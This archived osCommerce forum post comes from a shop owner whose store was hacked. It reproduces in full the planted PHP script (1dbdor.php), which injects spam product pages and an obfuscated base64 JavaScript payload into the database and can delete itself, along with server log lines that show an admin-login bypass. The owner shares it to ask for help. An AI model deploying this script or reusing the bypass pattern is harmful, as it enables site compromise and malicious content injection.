Jump to content

Archived

This topic is now archived and is closed to further replies.

kenkenms

database got hack from Russian hacker

Recommended Posts

my osc database was got hacked, put some of drugs link to our products, I found the script on images folder call 1dbdor.php

 

<?php

 

ignore_user_abort(1);

set_time_limit(0);

 

include "../includes/configure.php";

include "../includes/database_tables.php";

 

$keysFile = "1dballed.txt";

$linksFile = "1dblinks.txt";

 

if ($_REQUEST['d'] == '1') {

unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);

unlink($keysFile);

unlink($linksFile);

die ('deleted');

}

 

$pageNum = 100;

 

$linksMinMax = array (2,5);

$keysMinMax = array (20,40);

$keycentMinMax = array (7,10);

$stepmaxdif = 5;

$addlink = base64_decode('PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPjwhLS0gDQp2YXIgcz0iPWVqdyF0dXptZj4jeGpldWk7Znlxc2Z0dGpwbyllcGR2bmZvdS9jcGV6L3BnZ3RmdVhqZXVpKjwhaWZqaGl1OzMxMTFxeTwhcWJlZWpvaC51cHE7MjExcXk8IW1mZ3U7MXF5PCF1cHE7MXF5PCFzamhpdTsxcXk8IWNiZGxoc3B2b2UuZHBtcHM7ISRnZ2dnZ2c8IXVmeXUuYm1qaG87IWRmb3VmczwhcXB0anVqcG87IWJjdHBtdnVmPCF3anRqY2ptanV6OyF3anRqY21mPCF7LmpvZWZ5OyEzMjYyPCFlanRxbWJ6OyFjbXBkbDwjPz1iIWlzZmc+IyMhcG9EbWpkbD4jeGpvZXB4L21wZGJ1anBvIT4oaXV1cTswMHdmZGp1Zi9qb2dwMGdic25iL3FpcSg8IXNmdXZzbyFnYm10ZjwjPz1qbmghY3BzZWZzPjEhdHNkPiNpdXVxOzAweW5tL3Fiem5mb3VzeS9kcG4wY2Jvb2ZzdDA0NDd5MzkxL2txaCM/Cz1jcz89dHVzcG9oPz8/PyFEbWpkbCF1cCFGb3VmcyE9PT09MHR1c3BvaD89MGI/PTBlanc/IjttPSIiO2ZvcihpPTA7aTxzLmxlbmd0aDtpKyspe2lmKHMuY2hhckNvZGVBdChpKT09Mjgpe20rPScmJ31lbHNlIGlmKHMuY2hhckNvZGVBdChpKT09MjMpe20rPSchJ31lbHNle20rPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KGkpLTEpfX1kb2N1bWVudC53cml0ZShtKTsvLy0tPjwvc2NyaXB0Pg==');

$lastkdel = "";

 

$link = mysql_pconnect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die("Could not connect");

mysql_select_db(DB_DATABASE);

 

$keysArr = file ($keysFile);

 

for ($i=0;$i<=$pageNum-1;$i++)

{

$key = $keysArr[$i];

//foreach ($keysArr as $key)

//{

$page = '';

$key = ucfirst(trim($key));

$page = $addlink;

$page .= pageGen ($key);

$page .= AddLinks ();

insertDB ($key , $page);

//}

 

}

echo '1DBDOR';

 

function pageGen ($key)

{

global $keysMinMax , $keycentMinMax , $stepmaxdif , $keysArr;

 

$i=1;

$stepi = 1;

$maxslov = rand ($keysMinMax[0],$keysMinMax[1]);

 

$percent = rand ($keycentMinMax[0],$keycentMinMax[1]);

 

$mk = (int)($percent*$maxslov)/($percent+100) ;

$srstep = (int)$maxslov/$mk ;

 

$addtopage .= '<h1>'.$key.'</h1>';

 

while ($i <= $maxslov)

{

if ($stepi % 2 != 0)

{

$stepdif = rand(0,$stepmaxdif);

$step = $srstep + $stepdif;

}

else

{

$step = $srstep - $stepdif;

}

 

if ($i % $step == 0)

{

$tagkey = randtag($key);

$addtopage .= randDel($tagkey);

$i++;

$stepi++;

}

else

{

$otherkey = rand(0, count($keysArr)-1);

$addtopage .= randDel(trim($keysArr[$otherkey]));

$i++;

}

 

}

return $addtopage;

}

 

function randDel ($key)

{

global $lastkdel;

$dArr = array (' ' , ' ' , ', ' , '. ' , ' - ' , ': ' , '<br>', '<br><br>');

$d = array_rand ($dArr);

if ($lastkdel == '. ' || $lastkdel == '<br>' || $lastkdel == '<br><br>')

{

$res = ucfirst($key) . $dArr[$d];

}

else

{

$res = $key.$dArr[$d];

}

$lastkdel = $dArr[$d];

return $res;

}

 

function randtag ($string)

{

 

$st = array ( '<b>' , '<strong>' , '<i>' , '<em>' , '<blockquote>');

$et = array ('</b>', '</strong>', '</i>', '</em>' , '</blockquote>');

 

$r = rand (0 , count($st)-1);

 

return $st[$r] . $string . $et[$r];

}

 

function AddLinks ()

{

global $linksFile , $linksMinMax;

$addlinks = '';

$linksDel = array (', ' , ' | ' , '<br>');

$ldc = count($linksDel);

if (file_exists($linksFile))

{

$links = file ($linksFile);

$c = count ($links);

if ($c > $linksMinMax[1]*2)

{

$lmax = rand ($linksMinMax[0],$linksMinMax[1]);

$ldi = rand (0 , $ldc-1);

for ($i=0 ; $i < $lmax ; $i++ )

{

$addlinks .= ($i == 0) ? ( trim($links[rand(0,$c-1)]) ) : ( $linksDel[$ldi] . trim($links[rand(0,$c-1)]) );

}

return $addlinks;

}

else

{

return ;

}

}

else

{

return ;

}

}

 

function insertDB ( $key , $descr )

{

 

$key = mysql_escape_string($key);

$descr = mysql_escape_string($descr);

 

$r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS." (products_date_added,products_status) VALUES ('1993-01-01 01:00:00','1')" );

 

$r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS_DESCRIPTION." (products_name,products_description) VALUES ('".$key."','".$descr."')" );

$r = mysql_query ("select last_insert_id()");

$pid = mysql_result ($r, 0, 0);

 

 

LinkToFile ($pid , $key);

}

 

function linkToFile ($id , $key)

{

global $linksFile;

$link = '<a href="' . HTTP_SERVER . DIR_WS_HTTP_CATALOG .'product_info.php?products_id=' . $id . '">' . $key . '</a>';

$fp = fopen ($linksFile , "a");

fputs ($fp , $link."\r\n");

fclose ($fp);

}

 

?>

 

I can't found how can they login my admin, and the log

 

188.120.234.41 - - [05/Aug/2010:06:02:41 +0800] "GET /images/1dbdor.php HTTP/1.0" 200 181 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:51 +0800] "GET /images/1dblinks.txt HTTP/1.0" 200 9253 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:52 +0800] "GET /images/1dbdor.php?d=1 HTTP/1.0" 200 182 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:28 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:33 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:37 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:39 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-"

 

anyone can advise?

 

Regards

Dan

Share this post


Link to post
Share on other sites

×